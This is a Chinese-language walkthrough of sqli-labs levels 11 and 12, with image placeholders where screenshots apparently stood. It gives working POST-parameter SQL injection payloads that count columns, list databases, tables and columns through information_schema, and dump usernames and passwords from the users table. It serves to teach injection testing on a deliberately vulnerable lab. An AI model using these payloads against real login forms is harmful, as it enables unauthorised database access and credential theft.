sqli lab 11-12

时间:2021-10-23 01:18:25


查库: select schema_name from information_schema.schemata;
查表: select table_name from information_schema.tables where table_schema=‘security‘;
查列: select column_name from information_schema.columns where table_name=‘users‘;
查字段: select username,password from security.users;

 

less11

sqli lab 11-12

 

 

sqli lab 11-12

 

 

 

 

 

打开burp 抓包软件  之前打开手动配置代理

sqli lab 11-12

 

 

sqli lab 11-12

 

复制username和password

 sqli lab 11-12

 

 复制粘贴  执行

sqli lab 11-12

 

 执行后  登录成功

 加一个单引号 再次执行  出现错误

sqli lab 11-12

 

 

 构造出

sqli lab 11-12

 

 在password处验证

sqli lab 11-12

 
猜列数


uname=a‘ order by 3#&passwd=a &submit=Submit
或者是使用 uname=a&passwd=a’ order by 2# &submit=Submit同样可以进行判断,最后得出一共有两列。

 

3有返回的错误 2没有 所以得出有俩列
sqli lab 11-12

 

 sqli lab 11-12

 

 uname=a&passwd=a‘ union select 1,2 #&submit=Submit  明确有俩列

sqli lab 11-12

 

 

 

爆库:uname=a&passwd=a‘ union select 1,(select group_concat(schema_name)from information_schema.schemata) #&submit=Submit

 

 sqli lab 11-12

 

 

查看当前数据库:uname=a&passwd=a‘ union select 1,database() #&submit=Submit

sqli lab 11-12

 

 uname=a&passwd=a‘ union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479) #&submit=Submit

 

security -->  0x7365637572697479

 

 sqli lab 11-12

 

获取users表中的字段内容:uname=a&passwd=a‘ union select 1,(select group_concat(column_name)from information_schema.columns where table_name=0x7573657273) #&submit=Submit

 

users-->7573657273

 sqli lab 11-12

 

 

less-12

第12关与11关基本完全一致,只有数据包裹的格式不同,变成了(“a”),其他步骤完全一样,所以这里放一下最后的结果语句:

uname=a&passwd=a") union select 1,(select group_concat(concat_ws(0x2d,username,password))from security.users) #&submit=Submit

0x2d代表-

sqli lab 11-12